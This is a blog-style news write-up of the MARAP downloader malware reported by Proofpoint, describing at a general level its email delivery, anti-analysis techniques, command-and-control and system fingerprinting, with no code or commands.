Table of Contents
Table of ContentsMARAP: How Was It Discovered?What Are the Anti-Analysis Techniques Used?What Other Modules Is It Using?
In the world of jeopardies, chaos and digital threats what can one expect? Totally nothing. Because now even preventive measures don’t work when it comes to cyber threats and dangers. Hackers have started using anti-analysis techniques to make themselves undetectable and to prevent their code from getting debugged. This is the level where even automated tools have failed to respond.
However, in continuation with a series of countless malware reports, recently, a new downloader malware dubbed ‘MARAP’ that is ‘Param’ when spelled in reverse order was discovered by researchers at Proofpoint. It has a functionality where it downloads other modules and payloads (part of the private user text) on the system. This malware downloader is reportedly targeting sales and banking sector.
This malware is distributed through emails as a part of new campaign. In these emails there are files attached with various extensions and macros. The code for MARAP is written in C and comes with anti-analysis techniques like API hashing, system fingerprinting module & more.
The use of these features is that it prevents the code and its purpose from getting detected by the analysts and automated tools used for malware detection.
MARAP: How Was It Discovered?
The malware downloader came into notice when various large email campaigns were observed in testing by the researchers at Proofpoint. These emails come with several attachments that are as follows:
- Microsoft Excel Web Query (“.iqy”) files
- Password-protected ZIP archives containing “.iqy” files
- PDF documents with embedded “.iqy” files
- Microsoft Word documents containing macros
The emails contain text related to sales and banks. On this, after analysis researchers said,
“As defenses become more adept at catching commodity malware, threat actors and malware authors continue to explore new approaches to increase effectiveness and decrease the footprint and inherent “noisiness” of the malware they distribute.”
The researchers also added,
“This new downloader, along with another similar but unrelated malware that we will detail next week, point to a growing trend of small, versatile malware that give actors flexibility to launch future attacks and identify systems of interest that may lend themselves to more significant compromise.”
What Are the Anti-Analysis Techniques Used?
1. API Hashing: Prevents the code and its purpose from the analysts and automated tools that are used for malware detection.
2. Timing Checks: Use of timing checks at the beginning of the function can delay debugging and sandboxing of the malware.
3. Systems MAC Address: It checks the system MAC address and compares them with all the existing virtual machines.
What Other Modules Is It Using?
Yes, there are other modules as well. Seems like hackers have used almost all of the techniques to make the malware undetectable and difficult to debug as well. Let’s see what other modules does MARAP come with:
1. Command & Control
The hackers are using HTTP for its command & control communication. Once the command is executed, it sends a reply message to C&C that includes the bot ID, command, command ID, flag controlling response type, command status code and response data.
2. System Fingerprinting Module
This module is dynamic link library (DLL) file, which is also written in C language. This module is used to collect and send array of information & data to C&C server hosted by the hackers. The information it can collect & send is as follows:
- Domain name
- IP address
- Windows version
- List of Microsoft Outlook .ost files
- Anti-virus software detected
Well, it will be not at all be surprising for us if banks and financial institutions start getting hacked. And have you ever thought of a bank giving huge amount of money to hackers to get its own data back? If you have then we all know that day isn’t far.
If you found this helpful, please let us know what changes you notice once you have applied the changes in the comment box given.